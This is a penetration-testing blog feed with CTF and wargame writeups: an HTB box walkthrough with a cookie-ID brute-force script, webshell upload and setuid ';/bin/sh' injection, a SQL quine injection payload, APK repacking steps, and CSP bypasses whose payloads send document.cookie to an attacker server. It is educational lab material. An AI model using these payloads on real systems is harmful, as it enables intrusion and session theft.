tag:blogger.com,1999:blog-43856140921078662082024-03-14T18:25:10.673+08:00Kerz's Penetration Test.Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.comBlogger30125tag:blogger.com,1999:blog-4385614092107866208.post-11835495821809224272021-08-28T02:40:00.003+08:002021-08-31T11:14:44.242+08:00[HTB] OopsieTwo ports were open: 22 (SSH) and 80 (HTTP).<div><br /></div><div><div><span style="background-color: #fff2cc;">$ sudo nmap -PS -sS 10.10.10.28 -sC</span></div><div><br /></div><div>Nmap scan report for 10.10.10.28</div><div>Host is up (0.68s latency).</div><div>Not shown: 998 closed ports</div><div>PORT STATE SERVICE</div><div>22/tcp open ssh</div><div>| ssh-hostkey:</div><div>| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)</div><div>| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)</div><div>|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)</div><div>80/tcp open http</div><div>|_http-title: Welcome</div></div><div><br /></div><div><br /></div><div>The front page had no login form and no other functionality.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiSH7RzpYFyS-PNTkn3YXwCl_Ce-Ada_l2wV5utiW4S83lrX9I52BtwFphd6BwueoxLb_LLHkDe9yrw8oUdQN4QQJEN5azGurozMvPNc2UC1QRuTjTYTkC_10j_4jzf_bDkTDiMClcw9Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="328" data-original-width="766" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiSH7RzpYFyS-PNTkn3YXwCl_Ce-Ada_l2wV5utiW4S83lrX9I52BtwFphd6BwueoxLb_LLHkDe9yrw8oUdQN4QQJEN5azGurozMvPNc2UC1QRuTjTYTkC_10j_4jzf_bDkTDiMClcw9Q/w469-h201/image.png" width="469" /></a></div><br />Viewing the page source (view-source) revealed other paths.</div><div><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHtDkLkOB1QuBlTGnPkdsL8FIsoyJS2ObcpcoAlKRcZOPA87yd1RnrKmXOPQciVBfCpqZVVmp7oKDn_maHX2hVzujQefLT9tQXzddMqQ2LmtxkYmiuKbwSKCInpRZbvYVyIJ9KWHxSNYA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="99" data-original-width="388" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHtDkLkOB1QuBlTGnPkdsL8FIsoyJS2ObcpcoAlKRcZOPA87yd1RnrKmXOPQciVBfCpqZVVmp7oKDn_maHX2hVzujQefLT9tQXzddMqQ2LmtxkYmiuKbwSKCInpRZbvYVyIJ9KWHxSNYA/" width="320" /></a></div><br /><br /></div><div>I found two important pieces of information:</div><div>1. /cdn-cgi/login/login.php</div><div>2. /uploads/</div><div><br /></div><div>I kept the second path in mind; it becomes useful later.</div><div><br /></div><div>The first path was a login page.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlCQHZRaI4t18wVSyNjGQu2c2JEANNMHrKbKKEBcvxGmO45D38hW8oI4Yfuhku-p46ACGUiFCDF7WTjdWNyyg295pT38VjfhpUP9jSYLPk8FiSTxFvFTVe5QmrOzWLeEYr7iF9YhvjOAk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="435" data-original-width="421" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlCQHZRaI4t18wVSyNjGQu2c2JEANNMHrKbKKEBcvxGmO45D38hW8oI4Yfuhku-p46ACGUiFCDF7WTjdWNyyg295pT38VjfhpUP9jSYLPk8FiSTxFvFTVe5QmrOzWLeEYr7iF9YhvjOAk/" width="232" /></a></div><br />The account was admin and the password was "MEGACORP_4dm1n!!"; the password came from the previous box.<br /></div><div><br /></div><div>After logging in I could see some menus and my cookie. 
The cookie was "user=34322; role=admin".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJTL2L27n9ixrEu2pseVgYbgAElTwfYJ_YXeIWN8P1mmHYCpBZZ1aGVE0UIKcJo5f66FCR8yayKkhbZMsKMwAXNaGYsxtf-ryerlZLmVKlqgN7Nw8CcEAVls_upspktj7btjOXVf2jsY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="245" data-original-width="276" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJTL2L27n9ixrEu2pseVgYbgAElTwfYJ_YXeIWN8P1mmHYCpBZZ1aGVE0UIKcJo5f66FCR8yayKkhbZMsKMwAXNaGYsxtf-ryerlZLmVKlqgN7Nw8CcEAVls_upspktj7btjOXVf2jsY/" width="270" /></a></div><br />The uploads menu showed the error message "This action require super admin rights".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1a_e11icttqz4z3s2aE5eHhfeRmMpug569fgeWo-4-nt_SU13xK4xLWiseKj2PKOwZvKjeiO8bT1IPONajt4c9eqL3xd10iaHFojbC62vA4SpH0FFTi0g8zM9YNyySS44oXjJiYN4PXY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="168" data-original-width="540" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1a_e11icttqz4z3s2aE5eHhfeRmMpug569fgeWo-4-nt_SU13xK4xLWiseKj2PKOwZvKjeiO8bT1IPONajt4c9eqL3xd10iaHFojbC62vA4SpH0FFTi0g8zM9YNyySS44oXjJiYN4PXY/" width="320" /></a></div><br /><br /></div><div>So I needed super admin rights. The application identifies the account purely by the user number in the cookie, so I iterated over that number until the uploads page accepted it.</div><div><br /></div><div><pre><code class="python" lang="python">import requests


def exp():
    host, port = "http://10.10.10.28", 80
    # The application trusts the numeric "user" cookie to identify the account,
    # so walk through candidate IDs until the uploads page stops rejecting us.
    for i in range(86574, 100000):
        cookies = {
            "user": str(i),
            "role": "admin"
        }
        r = requests.get(host + "/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
        # Rejected IDs get the "Authenticating" page; anything else is the super admin.
        if "Authenticating" not in r.text:
            print(f"Found: {str(i)}")
            exit()


if __name__ == "__main__":
    exp()
</code></pre></div><div><br /></div><div>The script found the user number that unlocks the uploads menu.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1MwGuImkiPEKFuVNc8yXPr5riSdafHh9RvIj1qulbEar_LfzxEsRerjZ5A9t3p8_UOzLG3juecE43Q3tUH1z6_ukpKpsle9hki0_7p9MMvWZWL22SO6TZy9H_GLQtqg_7xDQlP4qtKg/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="24" data-original-width="110" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1MwGuImkiPEKFuVNc8yXPr5riSdafHh9RvIj1qulbEar_LfzxEsRerjZ5A9t3p8_UOzLG3juecE43Q3tUH1z6_ukpKpsle9hki0_7p9MMvWZWL22SO6TZy9H_GLQtqg_7xDQlP4qtKg/w198-h43/image.png" width="198" /></a></div><br />I generated a PHP webshell with weevely and uploaded it through the uploads menu; this is where the /uploads/ path found earlier comes in.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLdEuOTaeU5TGNCJHRUs6tp09b_mHATqtB4G3P0Z25Jwfy9KHHFCZzqSvEKeMJi1icANFEpM8boTBezKM2_MzvEQFhVG2b-eURrhH3h9HsCO7L-U_Pr_2H5wpFJGkHfRvAeNYNlimGRU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="56" data-original-width="286" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLdEuOTaeU5TGNCJHRUs6tp09b_mHATqtB4G3P0Z25Jwfy9KHHFCZzqSvEKeMJi1icANFEpM8boTBezKM2_MzvEQFhVG2b-eURrhH3h9HsCO7L-U_Pr_2H5wpFJGkHfRvAeNYNlimGRU/" width="320" /></a></div><br />Through the webshell I found a user account and password on the box.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2E1ihD1ZK0u9pwewZPCxmuJcFMUV8r520ucg5G2uz1gOmoMHuo-AyVS9QRBphwlYMv_4qXagEHf5s8SU9lyJWe7aw-V2QLNo_E9p1tRe8EOvyFFoY3eCeg0kvrC6tCfIvhR8NegIhrbQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="59" data-original-width="391" height="48" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2E1ihD1ZK0u9pwewZPCxmuJcFMUV8r520ucg5G2uz1gOmoMHuo-AyVS9QRBphwlYMv_4qXagEHf5s8SU9lyJWe7aw-V2QLNo_E9p1tRe8EOvyFFoY3eCeg0kvrC6tCfIvhR8NegIhrbQ/" width="320" /></a></div><br />I could access the box over SSH with robert's credentials and got the user flag.</div><div><br /></div><div>Next I needed root, so I looked for other vulnerabilities.</div><div><br /></div><div>After a few minutes I noticed a suspicious group name, "bugtracker".</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoE3XDgtFhAdnY6nwA038VlZJMTP6DAap0XFsl2hWWRoTM7oblTF6eDik_PZYCobvgfD2rs1JaeLkIH0kvO-rwTNAlgWaqUiXdCS9XYpx_aYWBtPeNd3_43NQ6zegXQqGR46ReRw66wuo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="36" data-original-width="575" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoE3XDgtFhAdnY6nwA038VlZJMTP6DAap0XFsl2hWWRoTM7oblTF6eDik_PZYCobvgfD2rs1JaeLkIH0kvO-rwTNAlgWaqUiXdCS9XYpx_aYWBtPeNd3_43NQ6zegXQqGR46ReRw66wuo/" width="320" /></a></div><br />Searching for files owned by that group turned up the suspicious binary /usr/bin/bugtracker:</div><div>- <span style="background-color: #fff2cc;">find / -type f -group bugtracker 2>/dev/null</span></div><div><br /></div><div>It is a setuid-root binary, so it runs with root permissions.</div><div><br /></div><div>The ID you enter ends up in a shell command, so I got a root shell after entering "<span style="background-color: #fff2cc;">;/bin/sh</span>".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbZcN7CDvd1JesduV69Qt9cE0Gy4rxe29DcjqIf2ijG14OsB_vDaNU9uyGiSiS8TCNCsp_UTM1poTII1aEsNx-Ed3jydma8c6w5U5GWZizv-X1e1csOqPbjLs4mkR0_sJt170VPAXr2OA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="306" data-original-width="289" height="240" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbZcN7CDvd1JesduV69Qt9cE0Gy4rxe29DcjqIf2ijG14OsB_vDaNU9uyGiSiS8TCNCsp_UTM1poTII1aEsNx-Ed3jydma8c6w5U5GWZizv-X1e1csOqPbjLs4mkR0_sJt170VPAXr2OA/" width="227" /></a></div><br /><br /></div><div>END</div><div><br /></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-51698582421190880732021-08-25T09:45:00.020+08:002021-08-31T11:14:32.925+08:00Android Mobile App Assessment - Frida environment<p>This is how I set up a test environment for Frida.</p><p>Below is my test environment for frida-server and frida-client:</p><pre>+------------------------------------------------------------------+
| Windows 10 (192.168.1.101)                                       |
|                                                                  |
|   +----------------------+        +----------------------------+ |
|   | Android Studio AVD   | <----> | Ubuntu on VM Player        | |
|   | IP: 10.0.2.2 (NAT)   |        | IP: 192.168.172.129 (NAT)  | |
|   +----------------------+        +----------------------------+ |
+------------------------------------------------------------------+</pre><p>That's a simple test environment.</p><p>The <a href="https://github.com/frida/frida/releases" target="_blank">frida-server</a> runs on the Android Studio AVD, and the <a href="https://github.com/frida/frida" target="_blank">frida-tools</a> run on the Ubuntu server.</p><br /><br />Windows & AVD<br />1. Copy the frida-server binary to the Android device (/data/local/tmp).<br />1.1. <span style="background-color: #fff2cc;">adb.exe push /<your-path of frida-server file> /data/local/tmp/</span><div><br /><div>2. Open an adb shell and run frida-server on the AVD.<br />2.1. <span style="background-color: #fff2cc;">adb shell</span><br />2.2. Inside the shell: <span style="background-color: #fff2cc;">cd /data/local/tmp; chmod 755 ./frida-server; ./frida-server</span><br /></div></div><div><br /></div><div>Windows</div><div>3. Forward the frida ports with adb.</div><div>3.1. 
<span style="background-color: #fff2cc;">.\adb.exe forward tcp:27042 tcp:27042</span></div><div>3.2. <span style="background-color: #fff2cc;">.\adb.exe forward tcp:27043 tcp:27043</span></div><div>3.3. adb now forwards the ports, but it listens on 127.0.0.1 only, so the Ubuntu VM cannot reach them directly.</div><div><br /></div><div>4. Windows port proxy</div><div>4.1. <span style="background-color: #fff2cc;">netsh interface portproxy add v4tov4 listenport=27044 listenaddress=0.0.0.0 connectport=27042 connectaddress=127.0.0.1</span></div><div>4.2. <span style="background-color: #fff2cc;">netsh interface portproxy add v4tov4 listenport=27045 listenaddress=0.0.0.0 connectport=27043 connectaddress=127.0.0.1</span></div><div>4.3. <span style="background-color: #fff2cc;">netsh interface portproxy show all</span></div><div>4.4. The port proxy listens on 0.0.0.0 and relays to the adb-forwarded local ports. Be aware that this exposes frida-server, which has no authentication at all, to every host that can reach the Windows machine; bind listenaddress to the host's LAN IP or firewall ports 27044/27045 so that only the Ubuntu VM can connect.</div><div><div><br /></div><pre>+--------------------------------------------------------------------------------+
| Windows                                                                        |
|  +------------------+   adb forward            netsh portproxy  +------------+ |
|  | AVD              |                                           | Ubuntu     | |
|  | listening 27042  | <-- 127.0.0.1:27042 <-- 0.0.0.0:27044 <-- | frida-ps   | |
|  | listening 27043  | <-- 127.0.0.1:27043 <-- 0.0.0.0:27045 <-- |            | |
|  +------------------+                                           +------------+ |
+--------------------------------------------------------------------------------+</pre><div><br /></div><div>Ubuntu</div><div>5. 
Connect to frida-server through the proxy port.</div><div>5.1 <span style="background-color: #fff2cc;">frida-ps -H 192.168.1.101:27044</span></div></div><div><br /></div><div><br /></div><div>[Extra tips]</div><div>adb.exe logcat</div><div><br /></div><div><br /></div><div><br /></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-79797866497382925092021-08-24T17:42:00.003+08:002021-08-24T17:43:00.480+08:00corCTF - writeup for crypto/fibinaryIt is a simple crypto challenge. <div><br /></div><div>It provides the encoder enc.py and the encrypted flag flag.enc:
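As an added example that is not part of the original writeup, here is the direct inverse of the challenge's encoding (the enc.py listing and flag.enc follow after this block). Each 11-bit block selects Fibonacci weights 89, 55, ..., 2, 1, 1 from left to right, so decoding is just a weighted sum and no brute force over the character set is needed; the encoder is included only for the round-trip check.

```python
# Added example (not part of the original writeup): direct decoder for the
# "fibinary" encoding used by the challenge's enc.py, plus the matching encoder.


def fib_weights(n_bits: int = 11) -> list:
    """Fibonacci weights as enc.py builds them (fib[0] = fib[1] = 1), most
    significant first: bit k of a block selects fib[n_bits - 1 - k]."""
    fib = [1, 1]
    while len(fib) < n_bits:
        fib.append(fib[-1] + fib[-2])
    return fib[::-1]  # [89, 55, 34, 21, 13, 8, 5, 3, 2, 1, 1]


WEIGHTS = fib_weights()


def encode_char(c: str) -> str:
    """Greedy encoding, identical in behaviour to c2f() in the challenge's enc.py."""
    n = ord(c)
    bits = []
    for w in WEIGHTS:
        if n >= w:
            n -= w
            bits.append("1")
        else:
            bits.append("0")
    if n:
        raise ValueError(f"{c!r} does not fit in {len(WEIGHTS)} Fibonacci bits")
    return "".join(bits)


def encode(text: str) -> str:
    return " ".join(encode_char(c) for c in text)


def decode_block(block: str) -> str:
    """Inverse of encode_char: sum the weights of the set bits."""
    if len(block) != len(WEIGHTS) or set(block) - {"0", "1"}:
        raise ValueError(f"malformed block: {block!r}")
    return chr(sum(w for w, bit in zip(WEIGHTS, block) if bit == "1"))


def decode(enc: str) -> str:
    return "".join(decode_block(b) for b in enc.split())


# flag.enc exactly as given by the challenge (copied from the writeup).
FLAG_ENC = (
    "10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 "
    "10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 "
    "10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 "
    "00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 "
    "00101001010 10000101000 10100000100 00000100100"
)

if __name__ == "__main__":
    print(decode(FLAG_ENC))
```

The last block decodes to a newline, which is the trailing newline of flag.txt that enc.py encoded along with the flag.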
</div><div><br /></div><div>enc.py</div><div><br /></div><pre><code class="python">fib = [1, 1]
for i in range(2, 11):
    fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):
    # Greedy Fibonacci (Zeckendorf-style) encoding of one character into 11 bits.
    n = ord(c)
    b = ''
    for i in range(10, -1, -1):
        if n >= fib[i]:
            n -= fib[i]
            b += '1'
        else:
            b += '0'
    return b

flag = open('flag.txt', 'r').read()
enc = ''
for c in flag:
    enc += c2f(c) + ' '
with open('flag.enc', 'w') as f:
    f.write(enc.strip())</code></pre><div><br /></div><div>flag.enc</div><div><br /></div><pre><code class="plaintext">10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100</code></pre><div><br /></div><div>I wrote a simple brute-force script that re-encodes every ASCII character and matches the blocks.</div><div><br /></div><div>dec.py</div><pre><code class="python">fib = [1, 1]
for i in range(2, 11):
    fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):
    # Same encoder as enc.py; used to test each candidate character.
    n = ord(c)
    b = ''
    for i in range(10, -1, -1):
        if n >= fib[i]:
            n -= fib[i]
            b += '1'
        else:
            b += '0'
    return b


flag_enc = open('flag.enc', 'r').read()

dec = ''
for flag_blk in flag_enc.split(' '):
    # Try every ASCII code point until its encoding matches the block.
    for c in range(0, 127):
        if c2f(chr(c)) == flag_blk:
            dec += chr(c)
            break
print(dec)</code></pre><div><br /></div><div><br /></div><div>Flag:</div><div><div>corctf{b4s3d_4nd_f1bp!113d}</div></div><div><br 
/></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-69462214327588861922021-07-23T07:04:00.004+08:002021-07-23T07:07:32.730+08:00Quine SQL Injection <div>What is a Quine? Let's refer to <a href="https://en.wikipedia.org/wiki/Quine_(computing)" rel="nofollow" target="_blank">Wikipedia</a>.</div><link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/androidstudio.min.css" rel="stylesheet"></link>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script><div><br /></div><blockquote><div>A quine is a computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs, self-reproducing programs, and self-copying programs</div></blockquote><div><br /></div><div>A good example is the wargame problem "ouroboros golf" on <a href="http://Webhacking.kr">Webhacking.kr</a>.</div><div><br /></div><div>Below is the problem code:</div><pre><code class="language-php"><?php
include "../../config.php";
login_chk();
print_best_golfer(73);
$db = dbconnect("ouroboros");
if(preg_match("/\./i", $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_ouroboros where pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result['pw']}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])){
    // !!THIS IS PAYLOAD GOLF CHALLENGE!!
    // My solution of ouroboros golf is 210byte.
    // If your solution is shorter than mine, you will get 5 point per 1 byte.
    $len = 210 - strlen($_GET['pw']);
    if($len > 0){
        solve(73,$len * 5);
    }
    else{
        echo "<h2>nice try :)</h2>";
    }
}
highlight_file(__FILE__);
?></code></pre><br /><div>I need to inject SQL through $_GET['pw']; the query runs against the database and the result comes back as $result['pw'].</div><div><br /></div><div>Next, $result['pw'] must exist and be identical to my input ($result['pw'] === $_GET['pw']), so the query has to return exactly its own input: a SQL quine.</div><div><br /></div><div>Last, the payload must be shorter than 210 bytes to score, and it must not contain a dot because of the preg_match filter.</div><div><br /></div><div>Now it is time to build a quine generator for SQL. The building blocks are replace(), an indirect placeholder ($) that a second replace() substitutes with the template itself, and union select.</div><div><br /></div><div>In pseudocode, the simple replacement version looks like this (URL-encoded: + is a space and %23 is #):</div><pre><code class="plaintext">'union+select+replace(replace('"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23',char(34),char(39)),char(36),'"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23')as+a%23</code></pre><br />The inner replace() turns the double quotes (char(34)) of the template into single quotes (char(39)); the outer replace() substitutes the $ placeholder (char(36)) with the template itself, so the row returned in $result['pw'] is byte-for-byte the same as $_GET['pw']. The length can still be reduced; for your own quine practice, I do not give the optimized answer here.<div><br /></div><div>END</div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-13189591820871545152021-07-13T14:09:00.007+08:002021-07-23T10:29:50.738+08:00Android Reverse Engineering and modifying apk.<p>When conducting penetration tests of Android applications, this small piece may help you.</p><p>It is easy to decompile and repack Android apps (apk).</p><p>The following list describes some Android terms:</p><ul style="text-align: left;"><li>Smali: disassembled Dalvik bytecode in textual format, generated by baksmali, a DEX format disassembler</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://miro.medium.com/max/2400/1*lH0ViR8YZ1l-G5nZEJMi0A.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="197" data-original-width="800" height="153" src="https://miro.medium.com/max/2400/1*lH0ViR8YZ1l-G5nZEJMi0A.png" width="623" /></a></div><div><br /></div><ul style="text-align: left;"><li>App Manifest: XML file that provides essential app information</li></ul><p>Basic static analysis provides a general understanding of the mobile application's structure. apktool decodes the app's resources and disassembles its code:</p><code class="plaintext">$apktool d -o ./sample sample.apk</code><p>The apk contains metadata in the AndroidManifest.xml file, plus the following files and directories:</p><ul style="text-align: left;"><li>AndroidManifest.xml</li><li>classes.dex</li><li>res/</li><li>lib/</li><li>META-INF</li></ul><div><br /></div><div>We can modify the application logic in the disassembled class files (smali).</div><div><br /></div><div>There are a few ways to update smali files.</div><div><ul style="text-align: left;"><li>Manually add, edit or remove smali code. This requires learning smali; this <a href="https://www.programmersought.com/article/94154023223/" target="_blank">URL</a> may be useful. JD-GUI and jadx-gui help to read the decompiled Java alongside the smali.</li><li>Build a new Android app from your own Java code, then disassemble that apk to extract the smali code and transplant it.</li></ul></div><p>After updating the smali code, build an updated apk with apktool.</p><pre><code class="plaintext">$apktool b -o sample_new.apk ./sample</code></pre><p>Next, create a signing key and sign the new apk.</p><pre><code class="plaintext">$keytool -genkey -v -keystore resign.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
$jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore resign.keystore sample_new.apk alias_name
</code></pre><p>Note that jarsigner only produces a v1 (JAR) signature. Apps targeting Android 11 (API 30) or later must carry a v2 or newer APK signature, so if the repacked app refuses to install, zipalign it and sign it with apksigner from the SDK build-tools instead.</p><p>If you know the smali language, modifying an apk is much easier.</p><p><br /></p><p>Reference:</p><p>1. OWASP MASVS - https://github.com/OWASP/owasp-masvs/releases/</p>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-52154206048021618952021-04-24T07:17:00.004+08:002021-04-24T07:22:51.269+08:00CSP bypass with wargame<link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/androidstudio.min.css" rel="stylesheet"></link>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
What is Content-Security-Policy (CSP)?<br /><br />Content Security Policy (CSP) is an added security layer that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.<br /><br />However, a wrongly configured CSP gives a false sense of safety.<div><br /></div><div>Below are two unsafe scenarios taken from wargame problems.</div><div><br /></div><div>#1. Bypass CSP script-src 'nonce-random'.</div><div><br /></div><div>In the first problem, the HTTP response carries a CSP with script-src 'nonce-random':</div><div><pre><code class="plaintext">HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:01:38 GMT
Server: Apache/2.4.29 (Ubuntu)
<span style="background-color: #fcff01;">Content-Security-Policy: script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';
</span>Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 133
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8</code></pre>
I tried a CSS brute-force attack to leak the nonce value, but it did not work. Looking at the problem's source again, the page loaded an internal script file "script.js":</div><pre><code class="html"><h2>you can inject anything</h2>
<div id="injected">
foo
</div>
<script nonce="" src="/script.js" umibg4w3wggp8jqnjg2tl7wlge8=""></script>
</code></pre><div>Yes! Now I have a chance to load script.js from my own server with a <base> tag, because the CSP has no base-uri directive: the relative src="/script.js" resolves against the injected base, and the script element keeps its valid nonce, so the policy still allows it.</div><div><br /></div><div>I can steal the admin cookie with this payload:</div><div><pre><code class="html"><base href='http://[my server IP]/'></code></pre></div><div><br /></div><div>script.js on my server (the cookie is sent as the query string of the redirect):</div><div><pre><code class="javascript">location.href='http://[my server IP]/?'+document.cookie;</code></pre></div><div><br /></div><div>#2. Bypass CSP script-src "https://*.google.com"</div><div><br /></div><div>In the second problem, the CSP is script-src 'https://*.google.com'.</div><div><br /></div><div><div><pre><code class="html">HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:52:02 GMT
Server: Apache/2.4.29 (Ubuntu)
<span style="background-color: #fcff01;">Content-Security-Policy: script-src https://*.google.com/;
</span>Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8</code></pre></div><div>It allows only Google hosts. Many websites use Google's APIs, and a whole Google domain is usually assumed to be safe, so this kind of over-broad CSP setting is seen a lot.</div><div><br /></div><div>I bypassed this CSP with this payload:</div><div><pre><code class="html"><script src=https://accounts.google.com/o/oauth2/revoke?callback=var/**/a%3d%27http://[my server ip]%27;location.replace(a%252bdocument.cookie);></script></code></pre></div><div>The payload abuses a JSONP callback on an allowed google.com host: the endpoint echoes the callback parameter into a JavaScript response, so the attacker-controlled code is served from a whitelisted origin.</div><div><br /></div><div>How to mitigate this? Allow only the specific origin or script you actually need (for example script-src https://apis.google.com) instead of a wildcard host, and keep hosts with JSONP endpoints off the list entirely; adding base-uri 'none' and object-src 'none' closes the gaps used in the first problem. Nonce- or hash-based script-src is the more robust option when inline scripts are needed.</div><div><br /></div><div>~ kerz</div><div><br /></div><div>Reference:</div><div>Content Security Policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</div><div>Secure CSP: https://developers.google.com/web/fundamentals/security/csp</div>
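As an added example that is not part of the original post, the following small CSP linter flags the two weaknesses exploited above (a nonce with no base-uri, and a wildcard or JSONP-capable host in script-src) and checks a hardened header beside them. The two weak headers are the ones from the wargame responses; the hardened policy and the JSONP host list are constructed here for illustration (only accounts.google.com, the host used in the bypass, is listed).

```python
import re

# Added example (not part of the original post): a minimal CSP linter for the
# two misconfigurations shown above, plus a hardened policy for comparison.

# Header values copied from the two wargame responses in the post.
NONCE_POLICY = "script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';"
WILDCARD_POLICY = "script-src https://*.google.com/;"
# Hardened variant (constructed here): explicit default-src, no wildcard host,
# base-uri and object-src locked down.
HARDENED_POLICY = ("default-src 'none'; script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=' "
                   "https://apis.google.com; base-uri 'none'; object-src 'none'")

# Hosts known to expose JSONP-style endpoints usable for CSP bypass. Only the
# host used in the post is listed; extend this for your own environment.
JSONP_HOSTS = {"accounts.google.com"}


def parse_csp(header: str) -> dict:
    """Split a policy into {directive: [sources]}. Browsers keep the first
    occurrence of a duplicated directive, so later duplicates are dropped."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def host_of(source: str) -> str:
    """Host part of a host-source: https://*.google.com/ -> *.google.com"""
    m = re.match(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:]+)", source, re.I)
    return m.group(1).lower() if m else ""


def host_matches(pattern: str, host: str) -> bool:
    """Does a CSP host pattern (possibly *.example) cover a concrete host?"""
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern


def lint_csp(header: str) -> list:
    policy = parse_csp(header)
    findings = []
    script = policy.get("script-src", policy.get("default-src"))
    if script is None:
        findings.append("no script-src or default-src: script loading is unrestricted")
        script = []
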